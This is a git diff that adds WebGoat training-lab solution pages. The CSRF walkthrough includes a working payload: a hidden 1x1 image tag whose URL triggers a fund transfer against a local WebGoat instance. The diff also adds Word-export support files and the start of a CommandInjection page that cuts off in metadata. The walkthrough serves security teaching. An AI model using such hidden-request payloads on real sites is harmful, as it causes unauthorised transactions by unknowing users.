+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->Your
+goal is to send an email to a newsgroup that contains an image whose URL is
+pointing to a malicious request. Try to include a 1x1 pixel image that includes
+a URL. The URL should point to the CSRF lesson with an extra parameter
+&quot;transferFunds=4000&quot;. You can copy the shortcut from the left hand
+menu by right clicking on the left hand menu and choosing copy shortcut.
+Whoever receives this email and happens to be authenticated at that time will
+have his funds transferred. When you think the attack is successful, refresh
+the page and you will find the green check on the left hand side menu.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype
+ id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
+ path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_105" o:spid="_x0000_i1029" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
+src="/WebGoat/lesson_solutions/CSRF_files/image011.jpg" v:shapes="Picture_x0020_105"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>1</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> How to perform CSRF</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<h3 style='text-align:justify'>Solution:</h3>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>To
+complete this lesson you need to embed HTML code in the message box. This HTML
+code should contain a image tag linking to an URL that is not a real image<span
+style='mso-spacerun:yes'>  </span>will but start a transaction on the web
+server instead.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>The
+format of an image in html is &lt;img src=&quot;[URL]&quot; width=&quot;1&quot;
+height=&quot;1&quot; /&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'>The transaction can be triggered by an URL to the
+current lesson and an extra parameter “transferFunds’ and the amount. The
+width=1 and height=1 will not show the image.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'>This payload will work:<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'>&lt;img
+src=”http://localhost/WebGoat/attack?Screen=81&amp;menu=210&amp;transferFunds=5000”
+width=&quot;1&quot; height=&quot;1&quot; /&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'>So create a new message with title “Test” and a
+message with the payload.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_106" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;
+ height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
+src="/WebGoat/lesson_solutions/CSRF_files/image012.jpg" v:shapes="Picture_x0020_106"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>2</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Insert payload</p>
+
+<p class=MsoNormal style='text-align:justify'><span style='mso-fareast-language:
+JA'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'>The page will refresh and you will see a new message
+in the message list.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='mso-fareast-language:
+JA'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_107"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
+src="/WebGoat/lesson_solutions/CSRF_files/image013.jpg" v:shapes="Picture_x0020_107"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>3</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> New message test<span
+style='mso-fareast-language:JA'><o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Click
+on the message test. This will download the message and display the contents as
+HTML, executing the payload. Examine the HTTP Request in WebScarab that is
+generated when the browers tries to render the image tag.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_108" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:481.5pt;
+ height:344.25pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=642 height=459
+src="/WebGoat/lesson_solutions/CSRF_files/image014.jpg" v:shapes="Picture_x0020_108"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>4</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> CSRF attack</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Now
+you need to refresh the page to get the green star next to the lesson.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_109"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
+src="/WebGoat/lesson_solutions/CSRF_files/image015.jpg" v:shapes="Picture_x0020_109"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>5</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/CSRF_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/CSRF_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/filelist.xml b/main/project/WebContent/lesson_solutions/CSRF_files/filelist.xml
new file mode 100644
index 000000000..7f94019c7
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/CSRF_files/filelist.xml
@@ -0,0 +1,16 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../CSRF.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image011.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image012.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image013.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image014.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image001.png b/main/project/WebContent/lesson_solutions/CSRF_files/image001.png
new file mode 100644
index 000000000..9d82bd95a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image003.png b/main/project/WebContent/lesson_solutions/CSRF_files/image003.png
new file mode 100644
index 000000000..2189df262
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image005.png b/main/project/WebContent/lesson_solutions/CSRF_files/image005.png
new file mode 100644
index 000000000..95949f62b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image007.png b/main/project/WebContent/lesson_solutions/CSRF_files/image007.png
new file mode 100644
index 000000000..7bf06a985
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image009.png b/main/project/WebContent/lesson_solutions/CSRF_files/image009.png
new file mode 100644
index 000000000..d0e2f233c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image011.jpg b/main/project/WebContent/lesson_solutions/CSRF_files/image011.jpg
new file mode 100644
index 000000000..fbb254bd8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image011.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image012.jpg b/main/project/WebContent/lesson_solutions/CSRF_files/image012.jpg
new file mode 100644
index 000000000..32dbb3c02
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image012.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image013.jpg b/main/project/WebContent/lesson_solutions/CSRF_files/image013.jpg
new file mode 100644
index 000000000..8d76909d8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image013.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image014.jpg b/main/project/WebContent/lesson_solutions/CSRF_files/image014.jpg
new file mode 100644
index 000000000..be9c8e294
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image014.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/image015.jpg b/main/project/WebContent/lesson_solutions/CSRF_files/image015.jpg
new file mode 100644
index 000000000..ef71f6923
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF_files/themedata.thmx b/main/project/WebContent/lesson_solutions/CSRF_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CSRF_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection.html b/main/project/WebContent/lesson_solutions/CommandInjection.html
new file mode 100644
index 000000000..81b42cee0
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/CommandInjection.html
@@ -0,0 +1,738 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/CommandInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/CommandInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>34</o:TotalTime>
+  <o:Created>2007-07-11T11:04:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:25:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>198</o:Words>
+  <o:Characters>1130</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>9</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1326</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/CommandInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/CommandInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
